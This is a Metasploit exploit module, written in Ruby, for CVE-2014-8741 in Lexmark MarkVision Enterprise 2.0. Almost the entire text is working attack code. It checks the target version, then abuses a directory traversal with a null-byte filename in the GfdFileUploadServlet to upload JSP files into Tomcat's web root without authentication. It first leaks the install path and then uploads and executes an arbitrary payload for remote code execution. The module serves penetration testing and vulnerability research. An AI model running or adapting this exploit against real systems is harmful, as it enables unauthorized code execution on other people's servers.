Lexmark MarkVision Enterprise Arbitrary File Upload

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FileDropper  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload',  
'Description' => %q{  
This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.  
A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated  
attacker to upload arbitrary files, including arbitrary JSP code. This module has been  
tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.  
},  
'Author' =>  
[  
'Andrea Micalizzi', # Vulnerability Discovery  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2014-8741'],  
['ZDI', '14-410'],  
['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US']  
],  
'Privileged' => true,  
'Platform' => 'win',  
'Arch' => ARCH_JAVA,  
'Targets' =>  
[  
[ 'Lexmark Markvision Enterprise 2.0', { } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Dec 09 2014'))  
  
register_options(  
[  
Opt::RPORT(9788),  
OptString.new('TARGETURI', [true, 'ROOT path', '/'])  
], self.class)  
end  
  
def check  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html')  
})  
  
version = nil  
if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/  
version = $1  
else  
return Exploit::CheckCode::Unknown  
end  
  
if Gem::Version.new(version) <= Gem::Version.new('2.0.0')  
return Exploit::CheckCode::Appears  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
jsp_leak = jsp_path  
jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"  
# By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled  
# Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT  
traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf"  
  
print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...")  
if upload_file(traversal_leak, jsp_leak)  
print_good("#{peer} - JSP successfully uploaded")  
else  
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")  
end  
  
res = execute(jsp_name_leak)  
  
if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/  
upload_path = $1  
print_good("#{peer} - Working directory found in #{upload_path}")  
register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak))  
else  
print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")  
end  
  
jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"  
jsp_payload = payload.encoded  
traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf"  
  
print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...")  
if upload_file(traversal_payload, jsp_payload)  
print_good("#{peer} - JSP successfully uploaded")  
register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path  
else  
fail_with(Failure::Unknown, "#{peer} - JSP upload failed")  
end  
  
print_status("#{peer} - Executing payload...")  
execute(jsp_payload_name, 3)  
end  
  
def upload_file(filename, contents)  
good_signature = rand_text_alpha(4 + rand(4))  
bad_signature = rand_text_alpha(4 + rand(4))  
  
post_data = Rex::MIME::Message.new  
post_data.add_part(good_signature, nil, nil, 'form-data; name="success"')  
post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"')  
post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"")  
  
res = send_request_cgi(  
{  
'uri' => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'),  
'method' => 'POST',  
'data' => post_data.to_s,  
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"  
})  
  
if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature)  
return true  
else  
return false  
end  
end  
  
def execute(jsp_name, time_out = 20)  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path.to_s, jsp_name),  
'method' => 'GET'  
}, time_out)  
  
res  
end  
  
def jsp_path  
jsp =<<-EOS  
<%@ page language="Java" import="java.util.*"%>  
<%  
out.println("Path:" + System.getProperty("catalina.home"));  
%>  
EOS  
  
jsp  
end  
  
end  
`